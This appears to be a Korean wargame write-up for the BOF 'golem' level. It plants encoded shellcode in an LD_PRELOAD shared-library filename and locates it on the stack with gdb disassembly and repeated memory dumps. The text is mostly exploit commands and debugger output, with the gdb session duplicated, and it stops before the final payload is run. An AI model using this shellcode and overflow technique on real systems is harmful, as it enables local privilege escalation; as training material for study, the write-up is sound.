LD_PRELOAD 를 사용하라는 힌트를 받았다.
LD_PRELOAD는 공유라이브러리의 경로를 지정해주는 환경변수이다.
따라서 이 LD_PRELOAD에 실린 경로는 공유라이브러리 로써 가장 먼저 탑재가 되고, 스택의 하단에 위치한다.
LD_PRELOAD로 인해서 실행시키는 프로그램의 함수를 후킹 할 수 있는데, 여기서는 단순하게 파일명을 스택에 남기는 용으로 사용한다.
[skeleton@localhost tmp]$ vi `perl -e 'print "A"x100,".c"'`
[skeleton@localhost tmp]$ gcc -o `perl -e 'print "A"x100,".so"'` `perl -e 'print "A"x100,".c"'` -fPIC -shared
[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "A"x100,".so"'`
0xbffff5c0: 0x00000002 0x40023fd0 0x00000000 0x00000000
0xbffff5d0: 0x40013868 0x40000814 0x400041b0 0x00000001
0xbffff5e0: 0xbffff5ec 0x40001528 0x000002c8 0x00000000
0xbffff5f0: 0x080482d0 0x00000000 0x00000001 0x40000824
0xbffff600: 0xbffff60c 0x400075bb 0x40017000 0x00002fb2
0xbffff610: 0x40013868 0xbffff7c4 0x4000380e 0x40014450
0xbffff620: 0x6d6f682f 0x6b732f65 0x74656c65 0x742f6e6f
0xbffff630: 0x412f706d 0x41414141 0x41414141 0x41414141
0xbffff640: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff650: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff660: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff670: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff680: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff690: 0x41414141 0x2e414141 0x40006f73 0x40013868
0xbffff6a0: 0x4000220c 0xbffffbc7 0x00000000 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x40014a00 0x00000000
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff700: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff710: 0xbffff61c 0x00060000 0x00000000 0x00000000
0xbffff720: 0x00000000 0x00000001 0x00000000 0x00000000
0xbffff5d0: 0x40013868 0x40000814 0x400041b0 0x00000001
0xbffff5e0: 0xbffff5ec 0x40001528 0x000002c8 0x00000000
0xbffff5f0: 0x080482d0 0x00000000 0x00000001 0x40000824
0xbffff600: 0xbffff60c 0x400075bb 0x40017000 0x00002fb2
0xbffff610: 0x40013868 0xbffff7c4 0x4000380e 0x40014450
0xbffff620: 0x6d6f682f 0x6b732f65 0x74656c65 0x742f6e6f
0xbffff630: 0x412f706d 0x41414141 0x41414141 0x41414141
0xbffff640: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff650: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff660: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff670: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff680: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffff690: 0x41414141 0x2e414141 0x40006f73 0x40013868
0xbffff6a0: 0x4000220c 0xbffffbc7 0x00000000 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x40014a00 0x00000000
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff700: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff710: 0xbffff61c 0x00060000 0x00000000 0x00000000
0xbffff720: 0x00000000 0x00000001 0x00000000 0x00000000
이렇게 다 밀려도 살아있다.
[skeleton@localhost tmp]$ gcc -o `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"'` `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'` -fPIC -shared
[skeleton@localhost tmp]$ vi `perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".c"'`
[skeleton@localhost tmp]$ export LD_PRELOAD=`pwd`/`perl -e 'print "\x90"x200,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3",".so"
> '`
> '`
[skeleton@localhost tmp]$ gdb -q ./golem
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %esp,%ebp
0x8048473 <main+3>: sub $0x2c,%esp
0x8048476 <main+6>: cmpl $0x1,0x8(%ebp)
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push $0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add $0x4,%esp
0x8048489 <main+25>: push $0x0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add $0x4,%esp
0x8048493 <main+35>: mov 0xc(%ebp),%eax
0x8048496 <main+38>: add $0x4,%eax
0x8048499 <main+41>: mov (%eax),%edx
0x804849b <main+43>: add $0x2f,%edx
0x804849e <main+46>: cmpb $0xbf,(%edx)
0x80484a1 <main+49>: je 0x80484c0 <main+80>
0x80484a3 <main+51>: push $0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add $0x4,%esp
0x80484b0 <main+64>: push $0x0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add $0x4,%esp
0x80484ba <main+74>: lea 0x0(%esi),%esi
0x80484c0 <main+80>: mov 0xc(%ebp),%eax
0x80484c3 <main+83>: add $0x4,%eax
0x80484c6 <main+86>: mov (%eax),%edx
0x80484c8 <main+88>: push %edx
0x80484c9 <main+89>: lea 0xffffffd8(%ebp),%eax
0x80484cc <main+92>: push %eax
0x80484cd <main+93>: call 0x80483a8 <strcpy>
0x80484d2 <main+98>: add $0x8,%esp
0x80484d5 <main+101>: lea 0xffffffd8(%ebp),%eax
0x80484d8 <main+104>: push %eax
0x80484d9 <main+105>: push $0x8048599
0x80484de <main+110>: call 0x8048378 <printf>
0x80484e3 <main+115>: add $0x8,%esp
0x80484e6 <main+118>: push $0x2c
0x80484e8 <main+120>: push $0x0
0x80484ea <main+122>: lea 0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x80484ed <main+125>: push %eax
0x80484ee <main+126>: call 0x8048398 <memset>
0x80484f3 <main+131>: add $0xc,%esp
0x80484f6 <main+134>: lea 0xffffffd8(%ebp),%eax
0x80484f9 <main+137>: mov $0xbfffffcf,%edx
0x80484fe <main+142>: mov %edx,%ecx
0x8048500 <main+144>: sub %eax,%ecx
0x8048502 <main+146>: mov %ecx,%eax
0x8048504 <main+148>: push %eax
0x8048505 <main+149>: push $0x0
0x8048507 <main+151>: lea 0xffffffd8(%ebp),%eax
0x804850a <main+154>: lea 0x30(%eax),%edx
0x804850d <main+157>: push %edx
0x804850e <main+158>: call 0x8048398 <memset>
0x8048513 <main+163>: add $0xc,%esp
0x8048516 <main+166>: leave
0x8048517 <main+167>: ret
0x8048518 <main+168>: nop
0x8048519 <main+169>: nop
0x804851a <main+170>: nop
0x804851b <main+171>: nop
0x804851c <main+172>: nop
0x804851d <main+173>: nop
0x804851e <main+174>: nop
0x804851f <main+175>: nop
End of assembler dump.
(gdb)
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r `perl -e 'print Quit
(gdb) Quit
(gdb) Quit
(gdb) r `perl -e 'print "\xbf"x48'`
Starting program: /home/skeleton/tmp/./golem `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Breakpoint 1, 0x8048517 in main ()
(gdb) x/1000x 0xbfff000
0xbfff000: Cannot access memory at address 0xbfff000
(gdb) x/1000x 0xbfffff0
0xbfffff0: Cannot access memory at address 0xbfffff0
(gdb) x/1000x 0xbffff000
0xbffff000: 0x00000583 0x000006de 0x00000432 0x0000013f
0xbffff010: 0x0000016e 0x000002f1 0x00000000 0x00000420
0xbffff020: 0x000006c0 0x0000052e 0x0000046c 0x00000000
0xbffff030: 0x000004cd 0x00000660 0x00000000 0x000001af
0xbffff040: 0x0000048a 0x4002bb0e 0xbffff118 0x400081e6
0xbffff050: 0x4002bad5 0x4002bad5 0x40013868 0x40014930
0xbffff060: 0x0000598c 0x00000259 0x00000000 0x00000591
0xbffff070: 0x000006ea 0x000006ec 0x0000028f 0x000005bb
0xbffff080: 0x000006ce 0x00005450 0x000003c7 0x000006c2
0xbffff090: 0x00000000 0x0000070b 0x400221c0 0x00000545
0xbffff0a0: 0x40023fd0 0x4001cd70 0x40014930 0x00000004
0xbffff0b0: 0x40014ba0 0x00000002 0xbffff0d0 0x400221c0
0xbffff0c0: 0x40014b34 0x03c40f19 0xbffff14c 0x4002995c
0xbffff0d0: 0x400221c0 0x40014930 0x4002bad5 0x4002bad5
0xbffff0e0: 0x40013868 0x40014930 0x0000590a 0x0000065b
0xbffff0f0: 0x00000561 0x000005cc 0x00000000 0x40001402
0xbffff100: 0xbffff1d0 0x40008134 0x40000c7d 0x40024f23
0xbffff110: 0x40013868 0x40014930 0x00000f53 0x4000a7fd
0xbffff120: 0x40014920 0x40014c58 0x00000007 0x4000a74e
0xbffff130: 0x4010a1ec 0xbffff1d1 0x00000000 0x00000180
0xbffff140: 0x400221c0 0x4010a710 0x00000000 0x400221c0
0xbffff150: 0x40000474 0x00000000 0x40000824 0x400002f4
0xbffff160: 0x40013c00 0x00000004 0x40014ba0 0x00000004
0xbffff170: 0xbffff188 0x4001dd60 0x40014b3c 0x056e90c5
0xbffff180: 0xbffff204 0x40024f23 0x4001dd60 0x40014930
0xbffff190: 0x000000bd 0x4002bb0e 0xbffff268 0x400081e6
0xbffff1a0: 0x4002bad5 0x4002bad5 0x40013868 0x40014930
0xbffff1b0: 0x0000187f 0x00000001 0x4001fe70 0x00000310
0xbffff1c0: 0x40023fd0 0x4001cd70 0x40014930 0x00000004
0xbffff1d0: 0xbffff208 0x4000a7fd 0x40014920 0x40014c58
0xbffff1e0: 0x40001402 0xbffff2b4 0x40008134 0x40000ec9
0xbffff1f0: 0x40025713 0x40013868 0x40014930 0x00001743
0xbffff200: 0x40024f23 0x4001dd60 0xbffff248 0x4000a970
0xbffff210: 0x40017000 0x40108980 0x400c0b00 0x00000000
0xbffff220: 0x40000ec9 0x400707e4 0x00000001 0x00000000
0xbffff230: 0x00000031 0x40000664 0x00000000 0x40000824
0xbffff240: 0x400002f4 0x40013c00 0x00000004 0x40014ba0
0xbffff250: 0x00000004 0xbffff26c 0x4001e4f0 0x40014b3c
0xbffff260: 0x00dc28f5 0xbffff2e8 0x40025713 0x4001e4f0
0xbffff270: 0x40014930 0x40108980 0x40017000 0x00000031
0xbffff280: 0x4010a1ec 0x40108980 0xbffff2a8 0x4006fa3e
---Type <return> to continue, or q <return> to quit---
0xbffff290: 0x40108980 0x40017000 0x00000031 0x4010a1ec
0xbffff2a0: 0x00000001 0x40108980 0xbffff2bc 0x400711c7
0xbffff2b0: 0x40108980 0xbffff2ec 0x4000a7fd 0x40014920
0xbffff2c0: 0x40014c58 0x00000007 0x4000a74e 0x4010a1ec
0xbffff2d0: 0x0804859c 0x00000001 0x40014930 0x4001e4f0
0xbffff2e0: 0x4010a320 0x40025713 0x4001e4f0 0xbffff9a4
0xbffff2f0: 0x4000a970 0x40108980 0x00000400 0x4006c2e4
0xbffff300: 0x40014930 0xbffff9a4 0x4006428b 0x40108980
0xbffff310: 0x4010a1ec 0x4000ae60 0xbffffa44 0x00000000
0xbffff320: 0x0000675b 0x000081a4 0x00000001 0x00000000
0xbffff330: 0x00000000 0x00000808 0x00000000 0x00000000
0xbffff340: 0x00008561 0x000081ed 0x00000001 0x00000000
0xbffff350: 0x40001402 0xbffff424 0x400081e6 0x400013e1
0xbffff360: 0x400013e1 0x40013868 0x400013a5 0x40000824
0xbffff370: 0x400013d3 0x40013c00 0x40014b90 0x0000000e
0xbffff380: 0x40013e80 0x0804859c 0x250014c4 0x00000000
0xbffff390: 0x00000001 0x4002bad5 0x40001353 0x00000000
0xbffff3a0: 0xbffff428 0x40000814 0x00000052 0x40000824
0xbffff3b0: 0x400002f4 0x40013c00 0x00000004 0x40014ba0
0xbffff3c0: 0x00000003 0xbffff3dc 0x40000814 0x400140d4
0xbffff3d0: 0x0b725f23 0xbffff4b8 0x400013a5 0x40000814
0xbffff3e0: 0x40013c00 0x400002f4 0x40013c00 0x00000000
0xbffff3f0: 0x00000000 0x00000004 0x40014ba0 0x00000004
0xbffff400: 0xbffff420 0x40000674 0x400140d8 0x01ee5739
0xbffff410: 0xbffff4b8 0x40000edc 0x40013868 0x40013c00
0xbffff420: 0x00000000 0xbffff4e8 0x4000966a 0x080480f4
0xbffff430: 0x40014cf8 0x00000007 0x40013868 0x00000000
0xbffff440: 0x40013e70 0x40000814 0x40009c50 0x00005207
0xbffff450: 0x4001a0dc 0x4001a0dc 0x4001a0e8 0x00000018
0xbffff460: 0x400017f4 0x00000004 0x4001a0e8 0x40013c00
0xbffff470: 0xbffff4d0 0x2073f4cc 0xffffffff 0xffffffd0
0xbffff480: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff490: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff4a0: 0xbffff9d0 0x00000002 0x40023fd0 0x40013c00
0xbffff4b0: 0x4000ba15 0x00000000 0x00000000 0x00000001
0xbffff4c0: 0xbffff9c8 0xbffff9a3 0x0804859b 0x08048599
0xbffff4d0: 0x00000031 0xffffffff 0x00000000 0x00000001
0xbffff4e0: 0x40000824 0xbffff4f0 0x400075bb 0x40017000
0xbffff4f0: 0x00002fb2 0x40013868 0xbffff734 0x4000380e
0xbffff500: 0x400144d8 0x6d6f682f 0x6b732f65 0x74656c65
0xbffff510: 0x742f6e6f 0x902f706d 0x90909090 0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffff520: 0x90909090 0x0804859c 0x90909090 0x90909090
0xbffff530: 0x90909090 0x90909090 0x00000000 0x00000000
0xbffff540: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff550: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff560: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff570: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff580: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff590: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5a0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5d0: 0x90909090 0x90909090 0x90909090 0x68909090
0xbffff5e0: 0x81cee28a 0x530cb168 0x6f6a6854 0x0168e48a
0xbffff5f0: 0x68633069 0x69743069 0xfe59146a 0x79490c0c
0xbffff600: 0xe1f741fa 0x732ec354 0x4000006f 0x40013868
0xbffff610: 0x4000220c 0xbffffb3c 0x00000000 0x00000000
0xbffff620: 0x00000000 0x00000000 0x40014b00 0x00000000
0xbffff630: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff640: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff650: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff660: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff670: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff680: 0xbffff500 0x00060000 0x00000000 0x00000000
0xbffff690: 0x00000000 0x00000001 0x00000000 0x00000000
0xbffff6a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff700: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff710: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff720: 0x00000000 0x00000000 0x4000f7cb 0x4000f7cb
0xbffff730: 0x40013868 0xbffff778 0x4000c84c 0x08048034
0xbffff740: 0x00000006 0xbffff774 0x40013868 0xbffff9a8
0xbffff750: 0x40013da0 0x0001fbf1 0xbffffa50 0x000001fe
0xbffff760: 0x000001fe 0x000001fe 0x000001fe 0x00000006
0xbffff770: 0x08048034 0x080483c0 0xbffff79c 0x40002179
0xbffff780: 0xbffffa40 0x4000220c 0x080483c0 0x40013868
0xbffff790: 0x00000000 0xbffff7f8 0xbffff788 0xbffffa34
0xbffff7a0: 0x400020ea 0xbffffa40 0xbffff808 0x00000000
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) disas main
Dump of assembler code for function main:
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %esp,%ebp
0x8048473 <main+3>: sub $0x2c,%esp
0x8048476 <main+6>: cmpl $0x1,0x8(%ebp)
0x804847a <main+10>: jg 0x8048493 <main+35>
0x804847c <main+12>: push $0x8048570
0x8048481 <main+17>: call 0x8048378 <printf>
0x8048486 <main+22>: add $0x4,%esp
0x8048489 <main+25>: push $0x0
0x804848b <main+27>: call 0x8048388 <exit>
0x8048490 <main+32>: add $0x4,%esp
0x8048493 <main+35>: mov 0xc(%ebp),%eax
0x8048496 <main+38>: add $0x4,%eax
0x8048499 <main+41>: mov (%eax),%edx
0x804849b <main+43>: add $0x2f,%edx
0x804849e <main+46>: cmpb $0xbf,(%edx)
0x80484a1 <main+49>: je 0x80484c0 <main+80>
0x80484a3 <main+51>: push $0x804857c
0x80484a8 <main+56>: call 0x8048378 <printf>
0x80484ad <main+61>: add $0x4,%esp
0x80484b0 <main+64>: push $0x0
0x80484b2 <main+66>: call 0x8048388 <exit>
0x80484b7 <main+71>: add $0x4,%esp
0x80484ba <main+74>: lea 0x0(%esi),%esi
0x80484c0 <main+80>: mov 0xc(%ebp),%eax
0x80484c3 <main+83>: add $0x4,%eax
0x80484c6 <main+86>: mov (%eax),%edx
0x80484c8 <main+88>: push %edx
0x80484c9 <main+89>: lea 0xffffffd8(%ebp),%eax
0x80484cc <main+92>: push %eax
0x80484cd <main+93>: call 0x80483a8 <strcpy>
0x80484d2 <main+98>: add $0x8,%esp
0x80484d5 <main+101>: lea 0xffffffd8(%ebp),%eax
0x80484d8 <main+104>: push %eax
0x80484d9 <main+105>: push $0x8048599
0x80484de <main+110>: call 0x8048378 <printf>
0x80484e3 <main+115>: add $0x8,%esp
0x80484e6 <main+118>: push $0x2c
0x80484e8 <main+120>: push $0x0
0x80484ea <main+122>: lea 0xffffffd8(%ebp),%eax
---Type <return> to continue, or q <return> to quit---
0x80484ed <main+125>: push %eax
0x80484ee <main+126>: call 0x8048398 <memset>
0x80484f3 <main+131>: add $0xc,%esp
0x80484f6 <main+134>: lea 0xffffffd8(%ebp),%eax
0x80484f9 <main+137>: mov $0xbfffffcf,%edx
0x80484fe <main+142>: mov %edx,%ecx
0x8048500 <main+144>: sub %eax,%ecx
0x8048502 <main+146>: mov %ecx,%eax
0x8048504 <main+148>: push %eax
0x8048505 <main+149>: push $0x0
0x8048507 <main+151>: lea 0xffffffd8(%ebp),%eax
0x804850a <main+154>: lea 0x30(%eax),%edx
0x804850d <main+157>: push %edx
0x804850e <main+158>: call 0x8048398 <memset>
0x8048513 <main+163>: add $0xc,%esp
0x8048516 <main+166>: leave
0x8048517 <main+167>: ret
0x8048518 <main+168>: nop
0x8048519 <main+169>: nop
0x804851a <main+170>: nop
0x804851b <main+171>: nop
0x804851c <main+172>: nop
0x804851d <main+173>: nop
0x804851e <main+174>: nop
0x804851f <main+175>: nop
End of assembler dump.
(gdb)
(gdb) b *main+167
Breakpoint 1 at 0x8048517
(gdb) r `perl -e 'print Quit
(gdb) Quit
(gdb) Quit
(gdb) r `perl -e 'print "\xbf"x48'`
Starting program: /home/skeleton/tmp/./golem `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Breakpoint 1, 0x8048517 in main ()
(gdb) x/1000x 0xbfff000
0xbfff000: Cannot access memory at address 0xbfff000
(gdb) x/1000x 0xbfffff0
0xbfffff0: Cannot access memory at address 0xbfffff0
(gdb) x/1000x 0xbffff000
0xbffff000: 0x00000583 0x000006de 0x00000432 0x0000013f
0xbffff010: 0x0000016e 0x000002f1 0x00000000 0x00000420
0xbffff020: 0x000006c0 0x0000052e 0x0000046c 0x00000000
0xbffff030: 0x000004cd 0x00000660 0x00000000 0x000001af
0xbffff040: 0x0000048a 0x4002bb0e 0xbffff118 0x400081e6
0xbffff050: 0x4002bad5 0x4002bad5 0x40013868 0x40014930
0xbffff060: 0x0000598c 0x00000259 0x00000000 0x00000591
0xbffff070: 0x000006ea 0x000006ec 0x0000028f 0x000005bb
0xbffff080: 0x000006ce 0x00005450 0x000003c7 0x000006c2
0xbffff090: 0x00000000 0x0000070b 0x400221c0 0x00000545
0xbffff0a0: 0x40023fd0 0x4001cd70 0x40014930 0x00000004
0xbffff0b0: 0x40014ba0 0x00000002 0xbffff0d0 0x400221c0
0xbffff0c0: 0x40014b34 0x03c40f19 0xbffff14c 0x4002995c
0xbffff0d0: 0x400221c0 0x40014930 0x4002bad5 0x4002bad5
0xbffff0e0: 0x40013868 0x40014930 0x0000590a 0x0000065b
0xbffff0f0: 0x00000561 0x000005cc 0x00000000 0x40001402
0xbffff100: 0xbffff1d0 0x40008134 0x40000c7d 0x40024f23
0xbffff110: 0x40013868 0x40014930 0x00000f53 0x4000a7fd
0xbffff120: 0x40014920 0x40014c58 0x00000007 0x4000a74e
0xbffff130: 0x4010a1ec 0xbffff1d1 0x00000000 0x00000180
0xbffff140: 0x400221c0 0x4010a710 0x00000000 0x400221c0
0xbffff150: 0x40000474 0x00000000 0x40000824 0x400002f4
0xbffff160: 0x40013c00 0x00000004 0x40014ba0 0x00000004
0xbffff170: 0xbffff188 0x4001dd60 0x40014b3c 0x056e90c5
0xbffff180: 0xbffff204 0x40024f23 0x4001dd60 0x40014930
0xbffff190: 0x000000bd 0x4002bb0e 0xbffff268 0x400081e6
0xbffff1a0: 0x4002bad5 0x4002bad5 0x40013868 0x40014930
0xbffff1b0: 0x0000187f 0x00000001 0x4001fe70 0x00000310
0xbffff1c0: 0x40023fd0 0x4001cd70 0x40014930 0x00000004
0xbffff1d0: 0xbffff208 0x4000a7fd 0x40014920 0x40014c58
0xbffff1e0: 0x40001402 0xbffff2b4 0x40008134 0x40000ec9
0xbffff1f0: 0x40025713 0x40013868 0x40014930 0x00001743
0xbffff200: 0x40024f23 0x4001dd60 0xbffff248 0x4000a970
0xbffff210: 0x40017000 0x40108980 0x400c0b00 0x00000000
0xbffff220: 0x40000ec9 0x400707e4 0x00000001 0x00000000
0xbffff230: 0x00000031 0x40000664 0x00000000 0x40000824
0xbffff240: 0x400002f4 0x40013c00 0x00000004 0x40014ba0
0xbffff250: 0x00000004 0xbffff26c 0x4001e4f0 0x40014b3c
0xbffff260: 0x00dc28f5 0xbffff2e8 0x40025713 0x4001e4f0
0xbffff270: 0x40014930 0x40108980 0x40017000 0x00000031
0xbffff280: 0x4010a1ec 0x40108980 0xbffff2a8 0x4006fa3e
---Type <return> to continue, or q <return> to quit---
0xbffff290: 0x40108980 0x40017000 0x00000031 0x4010a1ec
0xbffff2a0: 0x00000001 0x40108980 0xbffff2bc 0x400711c7
0xbffff2b0: 0x40108980 0xbffff2ec 0x4000a7fd 0x40014920
0xbffff2c0: 0x40014c58 0x00000007 0x4000a74e 0x4010a1ec
0xbffff2d0: 0x0804859c 0x00000001 0x40014930 0x4001e4f0
0xbffff2e0: 0x4010a320 0x40025713 0x4001e4f0 0xbffff9a4
0xbffff2f0: 0x4000a970 0x40108980 0x00000400 0x4006c2e4
0xbffff300: 0x40014930 0xbffff9a4 0x4006428b 0x40108980
0xbffff310: 0x4010a1ec 0x4000ae60 0xbffffa44 0x00000000
0xbffff320: 0x0000675b 0x000081a4 0x00000001 0x00000000
0xbffff330: 0x00000000 0x00000808 0x00000000 0x00000000
0xbffff340: 0x00008561 0x000081ed 0x00000001 0x00000000
0xbffff350: 0x40001402 0xbffff424 0x400081e6 0x400013e1
0xbffff360: 0x400013e1 0x40013868 0x400013a5 0x40000824
0xbffff370: 0x400013d3 0x40013c00 0x40014b90 0x0000000e
0xbffff380: 0x40013e80 0x0804859c 0x250014c4 0x00000000
0xbffff390: 0x00000001 0x4002bad5 0x40001353 0x00000000
0xbffff3a0: 0xbffff428 0x40000814 0x00000052 0x40000824
0xbffff3b0: 0x400002f4 0x40013c00 0x00000004 0x40014ba0
0xbffff3c0: 0x00000003 0xbffff3dc 0x40000814 0x400140d4
0xbffff3d0: 0x0b725f23 0xbffff4b8 0x400013a5 0x40000814
0xbffff3e0: 0x40013c00 0x400002f4 0x40013c00 0x00000000
0xbffff3f0: 0x00000000 0x00000004 0x40014ba0 0x00000004
0xbffff400: 0xbffff420 0x40000674 0x400140d8 0x01ee5739
0xbffff410: 0xbffff4b8 0x40000edc 0x40013868 0x40013c00
0xbffff420: 0x00000000 0xbffff4e8 0x4000966a 0x080480f4
0xbffff430: 0x40014cf8 0x00000007 0x40013868 0x00000000
0xbffff440: 0x40013e70 0x40000814 0x40009c50 0x00005207
0xbffff450: 0x4001a0dc 0x4001a0dc 0x4001a0e8 0x00000018
0xbffff460: 0x400017f4 0x00000004 0x4001a0e8 0x40013c00
0xbffff470: 0xbffff4d0 0x2073f4cc 0xffffffff 0xffffffd0
0xbffff480: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff490: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff4a0: 0xbffff9d0 0x00000002 0x40023fd0 0x40013c00
0xbffff4b0: 0x4000ba15 0x00000000 0x00000000 0x00000001
0xbffff4c0: 0xbffff9c8 0xbffff9a3 0x0804859b 0x08048599
0xbffff4d0: 0x00000031 0xffffffff 0x00000000 0x00000001
0xbffff4e0: 0x40000824 0xbffff4f0 0x400075bb 0x40017000
0xbffff4f0: 0x00002fb2 0x40013868 0xbffff734 0x4000380e
0xbffff500: 0x400144d8 0x6d6f682f 0x6b732f65 0x74656c65
0xbffff510: 0x742f6e6f 0x902f706d 0x90909090 0x90909090
---Type <return> to continue, or q <return> to quit---
0xbffff520: 0x90909090 0x0804859c 0x90909090 0x90909090
0xbffff530: 0x90909090 0x90909090 0x00000000 0x00000000
0xbffff540: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff550: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff560: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff570: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff580: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff590: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5a0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5b0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5c0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff5d0: 0x90909090 0x90909090 0x90909090 0x68909090
0xbffff5e0: 0x81cee28a 0x530cb168 0x6f6a6854 0x0168e48a
0xbffff5f0: 0x68633069 0x69743069 0xfe59146a 0x79490c0c
0xbffff600: 0xe1f741fa 0x732ec354 0x4000006f 0x40013868
0xbffff610: 0x4000220c 0xbffffb3c 0x00000000 0x00000000
0xbffff620: 0x00000000 0x00000000 0x40014b00 0x00000000
0xbffff630: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff640: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff650: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff660: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff670: 0x00000000 0x00000001 0x00000000 0x00000001
0xbffff680: 0xbffff500 0x00060000 0x00000000 0x00000000
0xbffff690: 0x00000000 0x00000001 0x00000000 0x00000000
0xbffff6a0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6b0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6c0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6d0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6e0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff6f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff700: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff710: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff720: 0x00000000 0x00000000 0x4000f7cb 0x4000f7cb
